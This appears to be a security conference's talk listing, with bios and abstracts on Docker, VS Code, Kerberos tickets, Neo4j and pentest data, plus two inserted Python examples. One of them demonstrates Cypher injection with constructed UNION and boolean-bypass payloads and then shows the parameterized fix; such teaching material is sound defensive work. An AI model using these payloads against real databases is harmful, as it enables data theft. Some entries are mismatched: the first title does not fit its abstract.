- DEFCON 30 - Old Malware, New tools: Ghidra and Commodore 64

Contributor to several open-source security projects (Volatility, OpenCanary, Speakeasy, CETUS, etc.) and CTF player.

ABSTRACT
I'm sure that, like me, you have been asked to plug your USB drive into an "unknown" device... and then the doubt: what happened to my poor dongle behind the scenes? Did it steal my files? Encrypt them? Or "just" install malware? With **USBvalve** you can find out in seconds: built on super cheap off-the-shelf hardware, it lets you quickly test any USB file system activity and understand what is going on before it's too late!

Breaking Docker’s Named Pipes SYSTEMatically

Eviatar Gerzi
SPEAKER BIO

Eviatar Gerzi is a Sr. Security Researcher at CyberArk Labs where he focuses on researching and discovering the latest attack techniques and applying lessons learned to improve cyber defenses. Gerzi's primary research areas are network defense and DevOps. Prior to CyberArk, Gerzi worked as a security researcher with a specialty in Windows operating system and malware analysis. Gerzi is a skilled classical pianist. He also likes to solve CTFs and play chess and ping pong.
ABSTRACT
While Docker is mainly known for running containers in Linux environments, Docker Desktop is an application by Docker that lets Windows machines run containers on Windows.

In this talk, we'll show how our Windows container research took a different turn: we found multiple insecure APIs exposed through a named pipe that led to numerous privilege escalation vulnerabilities.

You click, you lose: a practical look at Visual Studio Code's security

Thomas Chauchefoin & Paul Gerste
SPEAKER BIO

Thomas Chauchefoin (@swapgs) is a Vulnerability Researcher in the Sonar R&D team. With a strong background in offensive security, he helps uncover and responsibly disclose 0-days in major open-source software. He also participated in competitions like Pwn2Own or Hack-a-Sat and was nominated for two Pwnie Awards for his research on PHP supply chain security.
Paul Gerste (@pspaul95) is a Vulnerability Researcher in the Sonar R&D team. In the last months, he has been hunting bugs in popular JavaScript and TypeScript applications, yielding critical vulnerabilities in projects such as Rocket.Chat, NodeBB, and Blitz.js. Paul has also been a CTF player and organizer for some years and loves to hack all web-related things.
ABSTRACT
Developers are becoming targets of choice for threat actors because of their access to business-critical code and services. By compromising a single developer, software backdoors and supply chain attacks can lead to the compromise of high-profile organizations. For instance, a recent campaign attributed to North Korea has set up social network profiles and websites to social engineer and infect prominent figures of the developer community with malicious Visual Studio projects and browser exploits.
At the same time, modern development tools like IDEs offer increasingly advanced features and deep integration with language ecosystems, sometimes at the cost of basic security measures. IDEs tried to counterbalance it by introducing new lines of defense (e.g., "Workspace Trust"), whose design inevitably led to a cat-and-mouse game to restrict access to sensitive attack surfaces while keeping most features available by default.
In this talk, we present the state of the art of Visual Studio Code's security. We go in-depth into its attack surface, how its extensions work and the technical details of two vulnerabilities we found in Visual Studio Code. These findings, CVE-2021-43891 and CVE-2022-30129, led to a $30,000 bounty with an unexpected twist. We also present 1-days discovered by other researchers, to develop the intuition of the audience. These concepts apply to most IDEs on the market, and everybody will think twice before opening third-party code!

A ticket worth waiting 65 years for

Charlie Bromberg
SPEAKER BIO

Shutdown (Charlie BROMBERG, [@_nwodtuhs](https://twitter.com/_nwodtuhs)) is a penetration testing team leader in the South of France at Capgemini. He specializes in Active Directory. Author of [The Hacker Recipes](https://www.thehacker.recipes/), creator of [Exegol](https://github.com/ShutdownRepo/Exegol), and many other open-source projects and tools ([pyWhisker](https://github.com/ShutdownRepo/pywhisker), [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast), [etc.](https://github.com/ShutdownRepo)).
ABSTRACT
Silver and Golden tickets are used for persistence purposes within Active Directory offensive operations. In 2022, the "diamond" and "sapphire" variations of those forged tickets emerged. Let's understand, forge and use those tickets, and get a step ahead of the blue team.

Secrets, data and cypher-injections: Neo4j attacks and cloud exploits

Nitay Bachrach & Or Emanuel (Varonis)
SPEAKER BIO

Or Emanuel is the Director of Research and Security and Nitay Bachrach is a Security Researcher at Varonis.
ABSTRACT
Neo4j is the most popular graph database. In this presentation, we will present how an attacker that encounters a Neo4j database can abuse it not only to manipulate the app and steal data from the graph, but also to retrieve more useful information from the server and move laterally to other services and cloud assets.
This talk will explore novel techniques for exploiting Neo4j. Starting from different Cypher-injections, how to overcome protections, and how to abuse them, all the way through to practical post-exploitation techniques.
Additionally, we show how attackers that gain a foothold and connect to an instance directly can extract secrets and pivot into the cloud (AWS, GCP, and Azure).
Security researchers will learn what they can do with Neo4j and how to exploit Neo4j servers. Defenders will learn what threat actors can do, so they will have the tools to protect their environment fully.
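To make the injection class the talk starts from concrete, here is an added example (not the speakers' code) of a Cypher injection against a query built by string formatting, next to the parameterized form that the Neo4j driver supports. No server is needed: each builder returns the query text (and parameters) that would be handed to `session.run()`, so the effect of the input is visible directly. The `User` and `Secret` labels, the quote-stripping "sanitizer" and both payloads are constructed for the illustration; the sanitizer is there to show why filtering input is the wrong fix when the value lands in an unquoted position.

```python
"""Cypher injection shown without a Neo4j server. Added example, not code
from the talk; labels, sanitizer and payloads are constructed.
"""


def find_user_vulnerable(name: str) -> str:
    # Vulnerable: the value is spliced into the Cypher text itself.
    return f"MATCH (u:User {{name: '{name}'}}) RETURN u.name AS r"


def naive_sanitize(value: str) -> str:
    # A "protection" that only strips quotes. It does nothing for values that
    # are interpolated into an unquoted (numeric) position.
    return value.replace("'", "").replace('"', "")


def find_by_id_vulnerable(user_id: str) -> str:
    # Still vulnerable: u.id is compared as a number, so no quote is needed to inject.
    return f"MATCH (u:User) WHERE u.id = {naive_sanitize(user_id)} RETURN u.name AS r"


def find_user_safe(name: str):
    # Correct fix: a query parameter. The driver ships $name as a value, never as
    # Cypher text. With the official Python driver: session.run(query, **params).
    return "MATCH (u:User {name: $name}) RETURN u.name AS r", {"name": name}


# Constructed payload for the quoted position: closes the string literal and the
# node pattern, appends a UNION that reads another label (UNION needs the same
# column name, hence "AS r"), and comments out the rest of the original query.
UNION_PAYLOAD = "x'}) RETURN u.name AS r UNION MATCH (s:Secret) RETURN s.value AS r //"

# Constructed payload for the numeric position: no quotes, so naive_sanitize
# passes it through unchanged and the WHERE clause becomes always-true.
BOOLEAN_PAYLOAD = "0 OR true"


def match_clauses(query: str) -> int:
    """Count MATCH clauses in the part of the query Neo4j would actually run
    (everything before a // comment). Two clauses where the developer wrote one
    means the input changed the structure of the query, not just a value."""
    return query.split("//", 1)[0].count("MATCH ")


if __name__ == "__main__":
    print(find_user_vulnerable(UNION_PAYLOAD))
    print(find_by_id_vulnerable(BOOLEAN_PAYLOAD))
    print(find_user_safe(UNION_PAYLOAD))
```

The safe builder returns the same query text whatever the input, which is the property to test for: a query whose shape depends on user input is injectable no matter how the input was filtered.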

Optimising Business Value with Secure Access Service Edge

Neil Thacker (Netskope)
SPEAKER BIO

Neil Thacker is Chief Information Security Officer (EMEA) for Netskope and holds over 20 years’ experience in the information security industry with previous roles at Swiss Re, Deutsche Bank and Camelot Group. Neil is advisory board member to the Cloud Security Alliance (CSA), advisory board member to NeuroCyber, and co-founder and board member to the Security Advisor Alliance (SAA). Neil is CISSP, CIPP/E and CEH certified and is a frequent speaker and author of cybersecurity, data protection and privacy-related content. Neil holds multiple awards including being named recently in the CSO30 by IDG which recognises 30 outstanding leaders for demonstrating outstanding business value and thought leadership within their organisation.
ABSTRACT
With the compounding pressures of high inflation, scarce and expensive talent and global supply challenges affecting many organisations today, this session will explain how organisations that have adopted Secure Access Service Edge (SASE) have seen gains through an improved risk posture, improved business agility and improved ROI/TCO.

Pentesting by the numbers - what data analysis tells about what we do

Charl van der Walt
SPEAKER BIO

ABSTRACT
We've done a lot of penetration testing over the years. Each test has its own scope, objectives and constraints. Each test is performed by a specific hacker, who has unique methods, strengths and weaknesses. Every test is different.
But with enough tests, performed over enough time, there is a goldmine of data on patterns and trends we can use to develop a better understanding of what we’re doing, what we’re reporting, and how our customers are responding.
As reports are a boutique product – hand-written by the tester and customized to meet the customer’s specific requirement - they do not lend themselves readily to quantitative analysis. For the purpose of this study, therefore, we have developed a basic Machine Learning capability that is able to ‘read’ these human-readable reports, quantify specific elements (like Findings and their assigned Severity) and even extract key entities, like CVE numbers, technologies involved, etc.
We collected, anonymized and enriched over 1,400 Penetration Test reports dating back to January 2018.
The ‘Findings’ of a penetration test report are obviously only a small element of the overall output, but they contain datapoints similar to the findings of a vulnerability scan and can be analysed in a similar way, and even compared to some extent.
In this presentation we tell the story of how we analyzed the data from thousands of penetration testing reports dating back more than four years. We describe the challenges we faced in data collection, the tools we developed to help us, the questions we asked once we had the data and the patterns that emerged once we had an analysis capability in hand.
We also share similar insights gleaned from a massive database of automated vulnerability scans and even from other perspectives, including security intelligence and incident detection and response.
None of these datasets is perfect, but they do hold valuable intelligence. Viewed together, they provide some invaluable insights. In this talk we will look at the data from penetration testing and other diverse services separately and, where sensible, together.
Join us in this session for a fascinating journey of exploration and discovery. Learn from our successes and our failures and help us think about the fresh questions and challenges that emerge when we try to extract useful intelligence from the work that we do.
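As an added example of the extraction step the abstract describes (turning a hand-written findings section into countable records with severities and CVE identifiers), the block below does it with regular expressions over a constructed plain-text report. It is not the speakers' machine-learning tooling, and it assumes a particular header format (`4.1 Title (Severity: High)`) that real reports will not all share; the CVE identifiers in the sample are real published IDs used only as sample entities.

```python
"""Extract findings, severities and CVE IDs from a pentest report's findings
section. Added example, not the speakers' tooling; the report is constructed.
"""
import re
from collections import Counter

# Constructed sample of a report's "Findings" section.
SAMPLE_REPORT = """
4. Findings
4.1 Outdated Apache HTTP Server (Severity: High)
The host runs Apache 2.4.49, which is affected by CVE-2021-41773 and CVE-2021-42013.
4.2 Missing HTTP security headers (Severity: Low)
No Content-Security-Policy header is returned.
4.3 Weak Kerberos service account password (Severity: Critical)
Kerberoasting recovered the password offline; the KDC is also missing the fix for cve-2014-6324.
"""

# A finding header: "<n>.<m> <title> (Severity: <level>)" on a line of its own.
FINDING_RE = re.compile(
    r"^\d+\.\d+\s+(?P<title>.+?)\s+\(Severity:\s*(?P<sev>Critical|High|Medium|Low|Info)\)\s*$",
    re.MULTILINE | re.IGNORECASE,
)
# CVE identifiers in either case; the sequence number has 4 to 7 digits.
CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,7}\b", re.IGNORECASE)


def extract_findings(report: str) -> list:
    """Return one dict per finding: title, normalized severity, and the CVEs
    mentioned in that finding's body (the text up to the next finding header)."""
    headers = list(FINDING_RE.finditer(report))
    findings = []
    for i, h in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(report)
        body = report[h.end():end]
        findings.append({
            "title": h.group("title"),
            "severity": h.group("sev").capitalize(),
            "cves": sorted({c.upper() for c in CVE_RE.findall(body)}),
        })
    return findings


def severity_counts(findings: list) -> dict:
    """Severity histogram: the first number most report analyses ask for."""
    return dict(Counter(f["severity"] for f in findings))


if __name__ == "__main__":
    found = extract_findings(SAMPLE_REPORT)
    for f in found:
        print(f)
    print(severity_counts(found))
```

Attributing a CVE to the finding whose body mentions it, rather than to the report as a whole, is what makes the counts comparable with a vulnerability scanner's per-finding output; the hard part in practice is recognising the many header layouts testers use, which is where the talk's learned model replaces the fixed pattern above.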

Why kidz couldn’t care less about your password advice?

Mia Landsem
SPEAKER BIO

Mia Landsem (25) is an award-winning Norwegian author, writer, speaker and ethical hacker. She started at Orange Cyberdefense Norway as a pentester in August 2020 after finishing her IT security education. Mia has great skill in social engineering, has written a best-selling children's book about how to be safe online and has given hundreds of lectures about image-based abuse.

Mia has won several prizes for her work in helping thousands of victims of online image abuse, hacking and fraud, winning "The Girl Award" (Plan International) in 2018 and "Influencer of the year". She has also been a finalist for "Bravest woman of the year" and "Årets Trønder" / "Trønder of the year", and a top 3 finalist (2021) for the international award "Cyber security woman of the year". The jury of The Girl Award said the following: "The winner of the Girl Award 2018 is an institution in itself. Mia Landsem shows the way by being energetic and extremely brave. Superman and Batman are nowhere near; this year's winner is among the roughest of its time. This is a winner we all want to be like. This is a winner we would all run to for help," says jury leader Navjot Sandhu.

ABSTRACT
For kids and teens to use social media and play games, they often have to authenticate using a password. They face the same cyber security threats as the grown-ups, from a younger age. Their parents are often their first role models when it comes to knowing about these threats and protecting themselves. Parents and children report that they talk together about online safety. That is great news, but when did we ever listen to our parents? Did we use our dog's name as our password? Did we share our password and PIN code with our best friend? Did we drink that damned tequila shot when we were told we would get sick? Yes we did.
Mia Landsem will talk about the issues these young children face: being hacked on their favorite game, the best friend who logged into their Instagram account and started writing nasty things to other children, the nude photos saved in their Snapchat that suddenly ended up in a hacker's hands, followed by a message that if they do not send more photos, the photos will be posted to all their friends. Mia will talk about HOW we should educate the young ones, and how to make them care about security, passwords and password managers. Why couldn't kidz care less about your password advice? Come find out!

Kaspersky

Marco Preuss (Kaspersky)
SPEAKER BIO

In 2022, Marco was appointed Deputy Director for the company’s Global Research & Analysis Team. Marco got promoted from the position of Director of Europe for the Global Research & Analysis Team at Kaspersky, that he has led since March 2013. Prior to becoming Director of Europe, Marco served as the head of Kaspersky’s Global Research & Analysis Team in Germany and senior security researcher. Marco has been working in the area of networking and IT security since the early 2000s. Having long term experience in his role, he is responsible for monitoring the threat landscape in Europe while specializing in threat intelligence, darknet research, password security, IoT security and privacy. In addition to research-related projects, Marco is a regular speaker at both closed and public events and maintains close contact with security partners.

Marco began his career with Kaspersky back in 2004 as a Technical Consultant, providing expert knowledge on Linux and Unix-based systems. He has also been involved in corporate sales management, before moving on to become the technical contact for the OEM department, supporting customized solutions. Marco worked extensively with the company’s product design and development teams and joined the research team as a Virus Analyst in 2009.

ABSTRACT